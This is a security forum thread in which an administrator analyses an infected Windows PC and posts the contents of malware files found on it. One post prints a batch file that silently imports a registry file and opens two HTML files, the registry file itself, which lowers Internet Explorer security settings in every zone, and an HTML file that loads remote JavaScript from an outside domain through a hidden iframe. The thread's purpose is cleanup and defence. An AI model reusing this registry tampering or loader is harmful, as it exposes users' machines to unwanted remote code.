Possible infection, with odd list of running processes
Results 1 to 6 of 6

Thread: Possible infection, with odd list of running processes

  1. #1
    Junior Member
    Join Date
    Jun 2004
    Posts
    8

    Possible infection, with odd list of running processes

    Good afternoon everone,

    I've got a remote "super user" who managed to sneak her infected machine on the network, and suddenly, I know exactly which machines got overlooked during the last security scan.

    All but one have been cleaned up, but the remaining infected machine is proving to be a tough nut to crack. I've run Sophos and Trend Micro AV against in, followed by a few rounds of AdAware and SpyBot, mixed in with a little CWEBSHREADER. The problems are still there however, and I have identified the following list of files that seem a bit suspicious.

    svchosting.exe
    command.eve
    wserv32.exe
    x.bat
    yea.reg
    staff.html

    According to the searches I've done, these files all belong to a number of different (old) virus variants, but I can't seem to find anything that leaves all of the above.
    Any thoughts?

  2. #2
    Sounds like youve got the scanning tools you need. Have you run those scans in "safe mode" (F8 on boot)? Are you positive that adaware, AVs, and spybot are completely updated? Search for that staff.html file, don't execute it, but read its contents with a plaintext editor like notepad. Same deal with x.bat. It'll help you fingerprint the malware. wserv32.exe looks like it could be trying to act as a webserver, by the name of it. Try browsing to the infected machines address with all scripting off. Obviously I haven't googled the names of those files, but let us know after you have those steps handled.

    Also try AVG antivirus, bitdefender AV, ClamAV as other optional scanners.

  3. #3
    The Doctor Und3ertak3r's Avatar
    Join Date
    Apr 2002
    Posts
    2,743
    Is the Box fully patched?

    wserv32 could be related to this..

    http://www.trendmicro.com/vinfo/viru...e=WORM_RBOT.AF
    http://www.arkateq.com/virus/698.htm

    There are a few "toys" that use x.bat staff.html yea.reg have only seen listings with these no actual information as to what they were..

    Command.eve may be related to a image editing prog EVE
    http://www.dpspro.com/tcs_commands/tcsos_eve.html

    Would be interesting to have a look at the code behind a couple of those..


    Cheers
    "Consumer technology now exceeds the average persons ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr

  4. #4
    Junior Member
    Join Date
    Jun 2004
    Posts
    8
    Ok, as per Soda's request, I've managed to isolate a few of the files and I'm posting their contents.

    First, x.bat

    @echo off

    REGEDIT.EXE /S YEA.REG

    staff.html

    x.html

    exit

    Pretty damn simple. So, lets see what yea.reg does.

    Windows Registry Editor Version 5.00

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
    "1004"=dword:00000000
    "1201"=dword:00000000

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
    "1004"=dword:00000000
    "1201"=dword:00000000

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
    "1004"=dword:00000000
    "1201"=dword:00000000

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
    "1004"=dword:00000000
    "1201"=dword:00000000
    "1406"=dword:00000000
    "1A04"=dword:00000000

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
    "1004"=dword:00000000
    "1201"=dword:00000000
    "1001"=dword:00000000
    "1200"=dword:00000000
    "1400"=dword:00000000
    "1606"=dword:00000000
    "1607"=dword:00000000

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults]
    "http"=dword:00000000

    I'm not familiar with the way Windows goes about it's registry business, but it looks like these keys are attempting to alter the way Internet Explorer handles it's predefined security zones. Most likely in an attempt to make it eaiser for other bits of malware to gain access to the machine. Just speculation in my part though.

    Finally, staff.html
    #<html>
    #<title> .:[ y E a K u K z ]:. </title>
    #<center>
    #<body>
    #<iframe id="content" style="position:absolute; visibility:hidden;"></iframe>
    #<script language="JavaScript" src="http://www.mt-download.com/mtrslib2.js"></script>
    #<script language="JavaScript">
    #mtrslib_uid = '1677';
    #mtrslib_retry = 1;
    #mt_set_onload();
    #</script>
    #</body>
    #</center>
    #</html>

    Not a clue whatmtrslib2.js does, but I've added that domain to the host file on the local machines here, and have it pointed to an internal page.

    Any additional thoughts?

  5. #5
    The Doctor Und3ertak3r's Avatar
    Join Date
    Apr 2002
    Posts
    2,743
    didn't find my notes at work regarding where I had encountered X.bat and friends.

    But I did find mtrslib2.js source

    Found this in the body: "MediaTicketsInstallerDemo"

    full JS attached

    Sry I can't offer better help..



    Cheers

    Edit: HAd a machine late yesterday that had MediaTickets installed, as there appeared to be no associated uninstaller or menu listing..oh and the customer didn't know what it was.. I removed it... This same machine had a file "USER32.EXE" I think it was in the C:\Windows\System folder.. Any scan I ran on this file was clean.. did a quick check using Fileanalyser.. and it appears to be a component of a Mass mailer or a phone home bug..
    Check your system.INI and registry for references to this file.. it loads with explorer.exe

    Becareful.. user32.dll is a system file don't confuse it with this file..

    "Consumer technology now exceeds the average persons ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr

  6. #6
    Junior Member
    Join Date
    Jun 2004
    Posts
    8
    Originally posted here by Und3ertak3r
    didn't find my notes at work regarding where I had encountered X.bat and friends.

    But I did find mtrslib2.js source

    Found this in the body: "MediaTicketsInstallerDemo"

    full JS attached

    Sry I can't offer better help..



    Cheers
    This is great, thank you. I don't have the tools to pull .js apart, so I'm very happy with this.
    Looks to be some sort of spyware, but I'm no programmer, so...

    Hehe, turns out the kids who wrote this put their real phone number on the domain contact info for mt-download.com.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •